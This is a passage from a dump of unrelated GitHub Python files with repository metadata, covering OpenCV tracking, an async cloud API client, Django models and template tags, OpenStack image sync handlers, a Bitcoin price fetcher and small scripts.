xcoord='%.2f'%(xcoord)\n ycoord='%.2f'%(ycoord)\n zcoord='%.2f'%(zcoord)\n diameter='%.2f'%(diameter)\n \n uvcoord=\"(u,v): (\" + str(u) + \",\" + str(v) + \")\"\n cv2.circle(frame, (int(cx), int(cy)), 5, (0,0,255),-1) #drawing the image center point\n cv2.putText(frame, str(uvcoord), (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,25))\n \n realcoords=\"(X,Y,Z): (\" + str(xcoord) + \",\" + str(ycoord) + \",\" + str(zcoord) + \")\"\n cv2.putText(frame, str(realcoords), (10,40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n pts.appendleft(center)\n \n\n else:\n cv2.putText(frame, \"object not found\", (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n \n# sumposx=0\n# sumposy=0\n #drawing tail and determining direction (and later velocity)\n for i in np.arange(1, len(pts)):\n# #TEST: smoothing function\n# sumposx=sumposx+pts[i][0]\n# sumposy=sumposy+pts[i][1]\n \n \n if pts[i-1] is None or pts[i] is None:\n continue\n \n if framenumber >= 10 and i == 1 and len(pts) == args[\"buffer\"]: #pts[i-10] is not None:\n #determine direction\n dX = pts[i][0]-pts[i-1][0]\n dY = pts[i][1]-pts[i-1][1]\n (dirX, dirY) = (\"\", \"\")\n far=\"\"\n swimspeed=\"\"\n \n #determine FPS\n fps.update()\n fps.stop()\n framerate= fps.fps()\n \n d=radius*2\n zdist=(d/473)**(1/(-1.07))\n \n #buffer to get rid of small movements (only big changes in position)\n if np.abs(dX)>=10:\n #calculating velocities, cleaning up strings\n #currently in px/s\n xvelocity=(pts[i][0]-pts[i-1][0])*framerate\n xvelocity=xvelocity*(zdist/f)\n xvelocity=xvelocity*.0254\n \n xvelocity='%.2f'%(xvelocity)\n v_x=\"V(x)= \" + str(xvelocity) + \"m/s\"\n cv2.putText(frame, str(v_x), (0,80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n if np.abs(dY)>=10:\n yvelocity=(pts[i][1]-pts[i-1][1])*framerate\n yvelocity=yvelocity*(zdist/f)\n yvelocity=yvelocity*.0254\n \n yvelocity='%.2f'%(yvelocity)\n v_y=\"V(y)= \" + str(yvelocity) + \"m/s\"\n cv2.putText(frame, str(v_y), (0,100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,0))\n \n #object location cases\n #FIGURE OUT WHY ALWAYS UP AND RIGHT\n if pts[i][0]-cx>0:\n dirX= \"right\"\n else:\n dirX=\"left\"\n \n if pts[i][1]-cy>0:\n dirY= \"down\"\n else:\n dirY= \"up\"\n \n if 0<=zdist<=12:\n far=\"close\"\n swimspeed=\"slow\"\n \n elif 12 5:\n self.logger.warning(f'More than 5 attempt failed sleep(2)')\n await asyncio.sleep(3)\n else:\n await asyncio.sleep(1)\n if i >= self.tries_count:\n raise exp\n else:\n break\n return resp\n\n async def _call_api(self, client_id: int = None, pagination: bool = False, *args, **kwargs):\n headers = {'Authorization': f'Bearer {await self._get_access_token(client_id)}'}\n if pagination:\n results = []\n if 'params' in kwargs:\n params = kwargs.pop('params')\n else:\n params = {}\n for i in self._page_params_generator():\n self.logger.debug(f'page: {i}')\n resp = await self._do_request(headers=headers, params=params | i, *args, **kwargs)\n resp_json = await resp.json()\n results.extend(resp_json['results'])\n if len(results) >= resp_json['count']:\n break\n else:\n resp = await self._do_request(headers=headers, *args, **kwargs)\n results = await resp.json()\n return results\n\n @staticmethod\n def _decode_jwt(token: str) -> dict:\n return jwt.decode(token, algorithms=[\"RS256\"], options={\"verify_signature\": False})\n\n def _is_token_expired(self, token):\n decoded_token = self._decode_jwt(token)\n if int(time.time()) > decoded_token.get('exp'):\n return True\n return False\n\n def _page_params_generator(self):\n limit = self.page_items_limit\n offset = 0\n while True:\n yield {'limit': limit,\n 'offset': offset}\n offset += limit\n\n async def _get_access_token(self, client_id: str):\n if client_id:\n access_token = await self._get_client_access_token(client_id)\n else:\n access_token = await self._get_reseller_access_token()\n return access_token\n\n async def _get_reseller_access_token(self):\n if not (self.reseller_credentials.get('access') and not self._is_token_expired(self.reseller_credentials.get('access'))):\n if self.reseller_credentials.get('refresh') and not self._is_token_expired(self.reseller_credentials.get('refresh')):\n tokens = await self._refresh_token(self.reseller_credentials.get('refresh'))\n self.reseller_credentials = self.reseller_credentials | tokens\n elif self.reseller_credentials.get('username') and self.reseller_credentials.get('password'):\n await self.reseller_login(username=self.reseller_credentials.get('username'),\n password=self.reseller_credentials.get('password'))\n else:\n self.logger.error('No credentials found!')\n return self.reseller_credentials.get('access')\n\n async def _get_client_access_token(self, client_id):\n creds = self.client_credentials.setdefault(client_id, {})\n if not (creds.get('access') and not self._is_token_expired(creds.get('access'))):\n if creds.get('refresh') and not self._is_token_expired(creds.get('refresh')):\n tokens = await self._refresh_token(creds.get('refresh'))\n creds.update(tokens)\n elif self.reseller_credentials:\n tokens = await self.get_client_admin_token(client_id)\n creds.update(tokens)\n else:\n self.logger.error('No credentials found!')\n return creds.get('access')\n\n async def reseller_login(self, username: str, password: str,):\n self.reseller_credentials['username'] = username\n self.reseller_credentials['password'] = password\n tokens = await self._login(username=username,\n password=password)\n self.reseller_credentials = self.reseller_credentials | tokens\n\n\n #############\n # Resellers #\n #############\n async def _login(self, username: str, password: str):\n resource_path = '/iam/auth/jwt/login'\n method = 'POST'\n body = {\"username\": username,\n \"password\": password}\n self.logger.debug(f'auth with: {username}')\n resp = await self._do_request(url=resource_path, method=method, json=body)\n tokens = await resp.json()\n return tokens\n\n async def _refresh_token(self, token: str):\n resource_path = '/iam/auth/jwt/refresh'\n method = 'POST'\n body = {\"refresh\": token}\n self.logger.debug(f'refresh token: {token[:10]}...')\n resp = await self._do_request(url=resource_path, method=method, json=body)\n tokens = await resp.json()\n return tokens\n\n async def get_client_admin_token(self, client_id: int):\n resource_path = f'/id/auth/jwt/clients/{client_id}/admin_token'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method)\n return resp\n\n async def get_client(self, client_id: str):\n resource_path = f'/iam/clients/{client_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, raise_for_status=True)\n return resp\n\n async def get_cloud_clients(self, state: str = 'active'):\n resource_path = '/iam/clients'\n method = 'GET'\n params = {'cloud': state}\n resp = await self._call_api(url=resource_path, method=method, params=params, raise_for_status=True,\n pagination=True)\n return resp\n\n async def get_users(self, client_id: str = None):\n resource_path = '/iam/users'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, raise_for_status=True,\n pagination=True)\n return resp\n\n\n #########\n # Cloud #\n #########\n async def list_regions(self, client_id: int = None):\n resource_path = '/cloud/v1/regions'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, pagination=True)\n return resp\n\n async def list_projects(self, client_id: int):\n resource_path = '/cloud/v1/projects'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, pagination=True)\n return resp\n\n async def list_flavors(self, project_id: int, region_id: int, client_id: int, include_prices='true'):\n resource_path = f'/cloud/v1/flavors/{project_id}/{region_id}'\n method = 'GET'\n params = {'include_prices': include_prices}\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_bmflavors(self, project_id: int, region_id: int, client_id: int, include_prices='true'):\n resource_path = f'/cloud/v1/bmflavors/{project_id}/{region_id}'\n method = 'GET'\n params = {'include_prices': include_prices}\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_instances(self, project_id: int, region_id: int, client_id: int, params: dict = {}):\n resource_path = f'/cloud/v1/instances/{project_id}/{region_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def list_loadbalancers(self, project_id: int, region_id: int, client_id: int, params: dict = {}):\n resource_path = f'/cloud/v1/loadbalancers/{project_id}/{region_id}'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, client_id=client_id, params=params, pagination=True)\n return resp\n\n async def search_instance_in_all_clients(self, instance_id: str = None, name: str = None):\n params = {}\n if instance_id:\n params['id'] = instance_id\n if name:\n params['name'] = name\n resource_path = '/cloud/v1/instances/search'\n method = 'GET'\n resp = await self._call_api(url=resource_path, method=method, params=params, pagination=True)\n return resp\n\n async def __aenter__(self) -> 'AioGCloud':\n return self\n\n async def __aexit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n await self.close()\n\n async def close(self) -> None:\n if self.session:\n await self.session.close()\n","repo_name":"v3111707/aiogcloud","sub_path":"src/aiogcloud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20606232528","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom testing_project.helpers.validators import has_letters_only_validator\n\n\nclass Profile(models.Model):\n first_name = models.CharField(\n max_length=25,\n validators=[has_letters_only_validator],\n )\n\n last_name = models.CharField(\n max_length=25,\n validators=[has_letters_only_validator],\n )\n\n age = models.IntegerField(\n validators=(\n MinValueValidator(0),\n MaxValueValidator(150),\n )\n )\n\n @property\n def full_name(self):\n return f'{self.first_name} {self.last_name}'\n","repo_name":"GerganaTuleshkova/testing_project","sub_path":"testing_project/common/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33948635288","text":"import os\n\nfrom supervisor.http import supervisor_auth_handler\nfrom supervisor.medusa import default_handler, filesys\nfrom supervisor.options import split_namespec\nfrom supervisor.states import ProcessStates\n\n\n# Supvisors is started in Supervisor so information is available in supervisor instance\nclass SupervisordSource(object):\n\n def __init__(self, supervisord):\n self.supervisord = supervisord\n if len(supervisord.options.server_configs) == 0:\n raise Exception('no server configuration in config file: {}'.format(supervisord.configfile))\n self.serverConfig = supervisord.options.server_configs[0]\n # server MUST be http, not unix\n serverSection = self.serverConfig['section'] \n if serverSection != 'inet_http_server':\n raise Exception('inet_http_server expected in config file: {}'.format(supervisord.configfile))\n # shortcuts (not available yet)\n self._supervisor_rpc_interface = None\n self._supvisors_rpc_interface = None\n\n @property\n def supervisor_rpc_interface(self):\n # need to get internal Supervisor RPC handler to call behaviour from Supvisors\n # XML-RPC call in an other XML-RPC call on the same server is blocking\n # so, not very proud of the following lines but could not access it any other way\n if not self._supervisor_rpc_interface:\n self._supervisor_rpc_interface = self.httpservers.handlers[0].rpcinterface.supervisor\n return self._supervisor_rpc_interface\n\n @property\n def supvisors_rpc_interface(self):\n if not self._supvisors_rpc_interface:\n self._supvisors_rpc_interface = self.httpservers.handlers[0].rpcinterface.supvisors\n return self._supvisors_rpc_interface\n\n @property\n def httpservers(self):\n # ugly but works...\n return self.supervisord.options.httpservers[0][1]\n\n @property\n def serverurl(self): return self.supervisord.options.serverurl\n @property\n def serverport(self): return self.serverConfig['port']\n @property\n def username(self): return self.serverConfig['username']\n @property\n def password(self): return self.serverConfig['password']\n @property\n def supervisor_state(self): return self.supervisord.options.mood\n\n def get_env(self):\n \"\"\" Return a simple environment that can be used for the configuration of the XML-RPC client. \"\"\"\n return {'SUPERVISOR_SERVER_URL': self.serverurl,\n 'SUPERVISOR_USERNAME': self.username,\n 'SUPERVISOR_PASSWORD': self.password}\n\n def close_httpservers(self):\n \"\"\" Call the close_httpservers of Supervisor.\n This is called when receiving the Supervisor stopping event in order to force the termination\n of any asynchronous pob. \"\"\"\n self.supervisord.options.close_httpservers()\n self.supervisord.options.httpservers = ()\n\n def autorestart(self, namespec):\n \"\"\" This method checks if autorestart is configured on the process. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n process = self.supervisord.process_groups[application_name].processes[process_name]\n return process.config.autorestart is not False\n\n def update_extra_args(self, namespec, extra_args):\n \"\"\" This method is used to add extra arguments to the command line. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n config = self.supervisord.process_groups[application_name].processes[process_name].config\n # on first time, save the original command line\n if not hasattr(config, 'config_ref'):\n setattr(config, 'config_ref', config.command)\n # reset command line\n config.command = config.config_ref\n # apply args to command line\n if extra_args:\n config.command += ' ' + extra_args\n\n def force_process_fatal(self, namespec, reason):\n \"\"\" This method is used to force a process state into supervisord and to dispatch process event to event listeners. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n process = self.supervisord.process_groups[application_name].processes[process_name]\n # need to force BACKOFF state to go through assertion\n process.state = ProcessStates.BACKOFF\n process.spawnerr = reason\n process.give_up()\n\n def force_process_unknown(self, namespec, reason):\n \"\"\" This method is used to force a process state into supervisord and to dispatch process event to event listeners. \"\"\"\n application_name, process_name = split_namespec(namespec)\n # WARN: the following line may throw a KeyError exception\n process = self.supervisord.process_groups[application_name].processes[process_name]\n process.spawnerr = reason\n process.change_state(ProcessStates.UNKNOWN)\n\n # this method is used to replace Supervisor web ui with Supvisors web ui\n def replace_default_handler(self):\n # create default handler pointing on Supvisors ui directory\n here = os.path.abspath(os.path.dirname(__file__))\n templatedir = os.path.join(here, 'ui')\n filesystem = filesys.os_filesystem(templatedir)\n defaulthandler = default_handler.default_handler(filesystem)\n # deal with authentication\n if self.username:\n # wrap the xmlrpc handler and tailhandler in an authentication handler\n users = {self.username: self.password}\n defaulthandler = supervisor_auth_handler(users, defaulthandler)\n else:\n self.supervisord.supvisors.logger.warn('Server running without any HTTP authentication checking')\n # replace Supervisor default handler at the end of the list\n self.httpservers.handlers.pop()\n self.httpservers.install_handler(defaulthandler, True)\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/infosource.py","file_name":"infosource.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"25138554348","text":"import networkx as nx\nimport numpy as np\nimport random\n\nfrom urllib3 import Retry\n\n\n\nclass graph():\n\n def __init__(self, grid_size, frac_imp, cuts, unimp_cost_range, imp_cost_range, SV_cost_range, service_cost_range):\n \n \n self.grid_size = grid_size\n self.cuts = cuts # this can be an int indicating number of cuts or list of edges that are chosen by the user \n m,n = grid_size\n self.impeded_edges = []\n \n\n self.G = nx.grid_2d_graph(m,n)\n self.inverse_mapping={}\n self.node_relabel()\n self.GV_start = [1]\n self.GV_goal = [m*n]\n self.SV_start = [np.random.randint(1,m*n+1)]\n\n if isinstance(self.cuts, int):\n self.random_cuts()\n else:\n self.impeded_edges = self.cuts\n \n self.add_obstacles() # if we need to obstacle nodes in the graph\n\n self.add_impeded_edges(frac_imp,unimp_cost_range ,imp_cost_range,SV_cost_range,service_cost_range)\n\n\n \n def GV_terminals(self):\n all_dist = nx.shortest_path_length(self.G, source=0, target=None, weight='None', method='dijkstra')\n # print(all_dist[0])\n max_dist_node = max(all_dist,key=all_dist.get)\n self.GV_start = [max_dist_node]\n all_dist = nx.shortest_path_length(self.G, source=max_dist_node, target=None, weight='None', method='dijkstra')\n self.GV_goal = [max(all_dist,key=all_dist.get)]\n # print(self.GV_start,self.GV_goal)\n # print(all_dist[self.GV_goal[0]])\n # input()\n\n def random_cuts(self):\n\n node_set = set(self.G.nodes)\n node_set.difference_update(self.GV_start+self.GV_goal)\n # print(node_set)\n\n def is_sep_set(n1,n2):\n n1, n2 = self.inverse_mapping[n1],self.inverse_mapping[n2]\n \n v1, v2 = slope*n1[0]-n1[1]+const, slope*n2[0]-n2[1]+const\n\n if v1*v2<0:\n return True\n elif v1*v2 == 0:\n if v1>0 or v2>0:\n return True\n else:\n return False\n else:\n return False\n \n \n for _ in range(self.cuts):\n valid_cut = False\n while valid_cut is False:\n cos = 0\n while cos==0:\n cos = random.uniform(-0.01,0.01)\n slope = random.uniform(0.99,1)/cos\n node_ = self.inverse_mapping[random.sample(node_set,1)[0]]\n # slope = 3\n # node_ = (1,0)\n const = -slope*node_[0] + node_[1]\n\n if is_sep_set(self.GV_start[0],self.GV_goal[0]):\n valid_cut = True\n \n for edge in self.G.edges:\n if is_sep_set(edge[0],edge[1]):\n self.impeded_edges.append(edge)\n \n # print(self.impeded_edges)\n # print(slope,node_)\n\n def pick_GV_start(self):\n '''This method can be used to randomly pick the GV start node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n \n def pick_GV_goal(self):\n '''This method can be used to randomly pick the GV goal node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n\n def pick_SV_start(self):\n '''This method can be used to randomly pick the SV start node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n \n def add_impeded_edges(self, percent_impeded, unimp_cost_range ,imp_cost_range, SV_cost_range, service_cost_range):\n \n num_imp_edge = int(percent_impeded*len(self.G.edges))\n \n edges = list(self.G.edges)\n if self.cuts == 0:\n self.impeded_edges = random.sample( edges, k = num_imp_edge)\n \n self.impeded_edges = list(set(self.impeded_edges))\n unimpeded_edges = list(set(edges)-set(self.impeded_edges))\n\n for edge in self.impeded_edges:\n \n serv_cost = np.random.randint(service_cost_range[0],service_cost_range[1])\n imp_cost = np.random.randint(imp_cost_range[0] , imp_cost_range[1])\n unimp_cost = np.random.randint(unimp_cost_range[0] , unimp_cost_range[1])\n sv_cost = np.random.randint(SV_cost_range[0],SV_cost_range[1])\n \n ''' Need unimp_cost <= imp_cost-serv_cost '''\n\n self.G.add_edge(edge[0],edge[1],impeded_cost = imp_cost, unimpeded_cost = unimp_cost, SV_cost = sv_cost, service_cost = serv_cost, color = 'r')\n # self.G.add_edge(edge[0],edge[1],impeded_cost = 10, unimpeded_cost = 1, SV_cost = 1, service_cost = 0, color = 'r')\n\n for edge in unimpeded_edges:\n unimp_cost = np.random.randint(unimp_cost_range[0] , unimp_cost_range[1])\n imp_cost = unimp_cost\n sv_cost = np.random.randint(SV_cost_range[0],SV_cost_range[1])\n serv_cost = 0\n\n self.G.add_edge(edge[0],edge[1],impeded_cost = imp_cost, unimpeded_cost = unimp_cost, SV_cost = sv_cost, service_cost = serv_cost, color = 'k')\n # self.G.add_edge(edge[0],edge[1],impeded_cost = 10, unimpeded_cost = 10, SV_cost = 1, service_cost = 0, color = 'r')\n\n\n def add_obstacles(self, obstacle=None):\n if obstacle == None:\n remove_edges = []\n for node in self.G.nodes:\n if float(np.random.randint(11))/10 > 1:\n self.G.nodes[node]['obs'] = 1\n remove_edges.extend(self.G.edges(node)) \n else:\n self.G.nodes[node]['obs'] = 0 \n self.G.remove_edges_from(remove_edges)\n else:\n remove_edges = []\n for node in self.G.nodes:\n if node in obstacle:\n self.G.nodes[node]['obs'] = 1\n remove_edges.extend(self.G.edges(node))\n else:\n self.G.nodes[node]['obs'] = 0\n self.G.remove_edges_from(remove_edges)\n\n\n def node_relabel(self):\n \n m,n = self.grid_size\n \n mapping = {}\n self.inverse_mapping = {}\n \n for node in self.G.nodes:\n label = node[0]+1+node[1]*m\n mapping[node] = label\n self.inverse_mapping[label] = node \n \n self.G = nx.relabel_nodes(self.G,mapping)\n\n\n","repo_name":"abhay1220/ASPP-with-GPLAstar","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32639476778","text":"from django import template\nfrom page.models import Page\nregister = template.Library()\n\n@register.inclusion_tag(\"main/menu.html\")\ndef menu():\n out = {}\n pages = Page.objects.all()\n out['pages'] = pages\n return out\n","repo_name":"zdimon/course-2","sub_path":"blog/main/templatetags/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31078703766","text":"from __future__ import unicode_literals\n\nimport json\nimport logging\nimport copy\n\nfrom fleio.openstack.images import serializers\nfrom fleio.openstack.sync.handler import BaseHandler, retry_on_deadlock\n\nLOG = logging.getLogger(__name__)\n\n\nclass ImageEventHandler(BaseHandler):\n serializer_class = serializers.ImageSyncSerializer\n version_field = 'sync_version'\n\n def __init__(self):\n # NOTE(tomo): image.send not handled, it may not be needed\n # NOTE(erno): the events image.upload and image.activate were removed because on snapshot delete\n # these notifications can come after image.delete (in notifications version 1)\n self.event_handlers = {'image.create': self.create_or_update,\n 'image.update': self.create_or_update,\n 'image.prepare': self.create_or_update,\n 'image.delete': self.delete}\n\n def serialize(self, data, region, timestamp):\n improp = data.get('properties', dict())\n owner = data.get('owner', None)\n im_data = copy.deepcopy(data)\n im_data['region_id'] = region\n im_data[self.version_field] = self.get_version(timestamp)\n im_data['instance_uuid'] = improp.get('instance_uuid', None)\n # save volume snapshot id\n im_data['volume_snapshot_uuid'] = None\n if 'block_device_mapping' in improp:\n block_device_mapping = json.loads(improp.get('block_device_mapping', '[]'))\n block_device_mapping_dict = block_device_mapping[0] if len(block_device_mapping) else {}\n im_data['volume_snapshot_uuid'] = block_device_mapping_dict.get('snapshot_id', None)\n im_data['os_distro'] = improp.get('os_distro', None)\n im_data['hypervisor_type'] = improp.get('hypervisor_type', None)\n im_data['type'] = improp.get('image_type', 'template')\n im_data['hw_qemu_guest_agent'] = improp.get('hw_qemu_guest_agent', False) == 'yes'\n im_data['os_version'] = improp.get('os_version', None)\n im_data['architecture'] = improp.get('architecture', None)\n is_public = data.get('is_public', None)\n if is_public is not None:\n im_data['visibility'] = 'public' if is_public else data.get('visibility', 'private')\n if owner and len(owner) > 31:\n im_data['project_id'] = owner\n return im_data\n\n def delete(self, payload, region, timestamp):\n image_id = payload.get('id', None)\n if not image_id:\n LOG.error('Unable to delete image without ID: {}'.format(payload))\n return super(ImageEventHandler, self).delete(image_id, region, timestamp)\n\n\nclass ImageMemberEventHandler(BaseHandler):\n serializer_class = serializers.ImageMemberSyncSerializer\n version_field = 'sync_version'\n\n def __init__(self):\n self.event_handlers = {'image.member.create': self.create_or_update,\n 'image.member.update': self.create_or_update,\n 'image.member.delete': self.delete}\n\n @retry_on_deadlock\n def create_if_missing(self, member_id, image_id):\n \"\"\"\n We will try to create an Image Member object if one doesn't exist yet.\n We need to do this here because Image Members do not have IDs in OpenStack\n and our BaseHandler always require an ID\n \"\"\"\n db_imm, created = self.model_class.objects.get_or_create(member_id=member_id, image_id=image_id,\n defaults=dict(member_id=member_id, image_id=image_id))\n return db_imm.id\n\n def serialize(self, data, region, timestamp):\n data[self.version_field] = self.get_version(timestamp)\n # NOTE(tomo): ImageMember does not have an actual ID in OpenStack\n # and as such, we need to fetch the object from DB by member_id and image_id\n if 'member_id' in data and 'image_id' in data:\n obj_id = self.create_if_missing(data['member_id'], data['image_id'])\n data['id'] = obj_id\n else:\n raise ValueError('Received an invalid ImageMember data: {}'.format(data))\n return data\n\n def delete(self, payload, region, timestamp):\n if payload.get('member_id', None) is not None and payload.get('image_id', None) is not None:\n self.model_class.objects.filter(member_id=payload.get('member_id'),\n image_id=payload.get('image_id')).delete()\n else:\n LOG.error('Unable to delete image member without member_id and image_id'.format(payload))\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/openstack/images/event_handlers.py","file_name":"event_handlers.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12595885927","text":"import requests\nfrom pycoingecko import CoinGeckoAPI\n\n\ndef valor_btc(moeda: str = 'BRL', segunda_moeda=\"USD\"):\n cg = CoinGeckoAPI()\n result = cg.get_price(ids='bitcoin', vs_currencies='{},{}'.format(moeda, segunda_moeda), include_24hr_change='true')\n moeda_valor = result['bitcoin'][moeda.lower()]\n moeda_24_hrs = result['bitcoin']['{}_24h_change'.format(moeda.lower())] / 100\n\n if segunda_moeda:\n segunda_moeda_valor = result['bitcoin'][segunda_moeda.lower()]\n segunda_moeda_24_hrs = result['bitcoin']['{}_24h_change'.format(segunda_moeda.lower())] / 100\n\n return moeda_valor, moeda_24_hrs, segunda_moeda_valor, segunda_moeda_24_hrs\n else:\n return moeda_valor, moeda_24_hrs\n\n\ndef bloco_num():\n api_link = \"https://blockchain.info/q/getblockcount\"\n\n request = requests.get(api_link, timeout=180)\n result = int(request.text)\n\n return result\n\n\ndef block_date(block_num):\n api_link = f\"https://blockchain.info/rawblock/{block_num}\"\n\n request = requests.get(api_link, timeout=180)\n result = request.json()\n\n return int(result['time'])\n","repo_name":"eitchtee/BTCBipolar","sub_path":"bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17768712929","text":"import json\n\ndef save(settings, filename):\n with open(filename, \"w\") as f:\n json.dump(settings, f)\n\ndef load(filename):\n try:\n with open(filename) as f:\n return json.load(f)\n except FileNotFoundError:\n return {}\n except json.decoder.JSONDecodeError:\n return {}","repo_name":"achen22/doubtfire-download-swin","sub_path":"jsonfile.py","file_name":"jsonfile.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29622308221","text":"# # Задача 2\ndef dd(a):\n b = []\n while a > 0:\n b.append(a % 10)\n a = a // 10\n b.reverse()\n return b\n\n\ndef create_full_sorted_list(l):\n l.sort(reverse=True)\n return list(map(dd, l))\n\n\nnums = [86, 85, 90, 7, 91]\nnums = create_full_sorted_list(nums)\n\n\n## Задача 3\ndef find_max(l):\n if len(l) > 1:\n max_ = find_max(l[1:])\n if l[0] < max_:\n return max_\n else:\n return l[0]\n if len(l) == 1:\n return l[0]\n\n\nl = [-1, -125125, 2151261, 0, 125215166, -1521267888]\nprint(find_max(l))\n# задача 4\nimport random\n\n\ndef find_colour(colours):\n list_of_colours = []\n for colour in colours:\n if colour[\"r\"] > colour[\"g\"] and colour[\"r\"] > colour[\"b\"]:\n list_of_colours.append(\"red\")\n elif colour[\"g\"] > colour[\"r\"] and colour[\"g\"] > colour[\"b\"]:\n list_of_colours.append(\"green\")\n elif colour[\"b\"] > colour[\"r\"] and colour[\"b\"] > colour[\"g\"]:\n list_of_colours.append(\"blue\")\n return list_of_colours\n\n\nbitmap = [\n {\n \"r\": random.randint(0, 255),\n \"g\": random.randint(0, 255),\n \"b\": random.randint(0, 255),\n }\n for i in range(20000)\n]\nprint(find_colour(bitmap))\n","repo_name":"saba070201/test_repo_suai","sub_path":"module1/p2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42105772452","text":"\"\"\"\nViews for the users app.\n\nThis module defines views for user-related actions, such as registration and profile management.\n\nFunctions:\n register: View for handling user registration.\n profile: View for managing user profiles.\n\n\"\"\"\n\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n\n\ndef register(request):\n \"\"\"\n View for handling user registration.\n\n If the request method is POST and the registration form is valid, a new user account is created,\n and the user is redirected to the login page with a success message.\n\n If the request method is GET, the registration form is displayed.\n\n Args:\n request: The HTTP request.\n\n Returns:\n HttpResponse: Rendered registration page or a redirect to the login page.\n \"\"\"\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"Account created for {username}. Please Log in\")\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, \"users/register.html\", {'form': form})\n\n\n@login_required\ndef profile(request):\n \"\"\"\n View for managing user profiles.\n\n If the request method is POST and both the user update form and profile update form are valid,\n the user and profile information are updated, and a success message is displayed.\n\n If the request method is GET, the user and profile update forms are displayed.\n\n Args:\n request: The HTTP request.\n\n Returns:\n HttpResponse: Rendered profile page or a redirect to the profile page.\n \"\"\"\n\n if request.method == 'POST':\n user_update_form = UserUpdateForm(request.POST, instance=request.user)\n profile_update_form = ProfileUpdateForm(request.POST,\n request.FILES,\n instance=request.user.profile)\n if user_update_form.is_valid() and profile_update_form.is_valid():\n user_update_form.save()\n profile_update_form.save()\n messages.success(request, f\"Your account has been updated.\")\n return redirect('profile')\n\n else:\n user_update_form = UserUpdateForm(instance=request.user)\n profile_update_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': user_update_form,\n 'p_form': profile_update_form\n }\n\n return render(request, 'users/profile.html', context)\n","repo_name":"BarakMShalom/Django-website-blog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27742143435","text":"import time\nimport csv\ndef rating():\n mainList = []\n f = open(\"Stock.txt\", \"rt\")\n f1 = csv.reader(f)\n for i in f1:\n if i != []:\n mainList.append(i)\n rate = []\n book = []\n stock = []\n edition = []\n price = []\n author = []\n count = 0\n for i in range(len(mainList)):\n price.append(mainList[i][3])\n book.append(mainList[i][0])\n stock.append(mainList[i][2])\n edition.append(mainList[i][7])\n rate.append(mainList[i][5])\n author.append(mainList[i][1])\n averagerate = 0\n for i in range(len(price)):\n averagerate+=float(rate[i])\n averagerate = averagerate /len(rate)\n print(\" \"*50+\"[particular] [all]\")\n asking = input(\" \"*50+\"Enter from above here \")\n if asking == \"all\":\n print(\" \"*50+\"Here is your data configuration loading............\")\n time.sleep(1)\n print(\" \"*50+\"book rating\")\n for i in range(len(mainList)):\n print(book[i]+\" \"+rate[i])\n print(\" 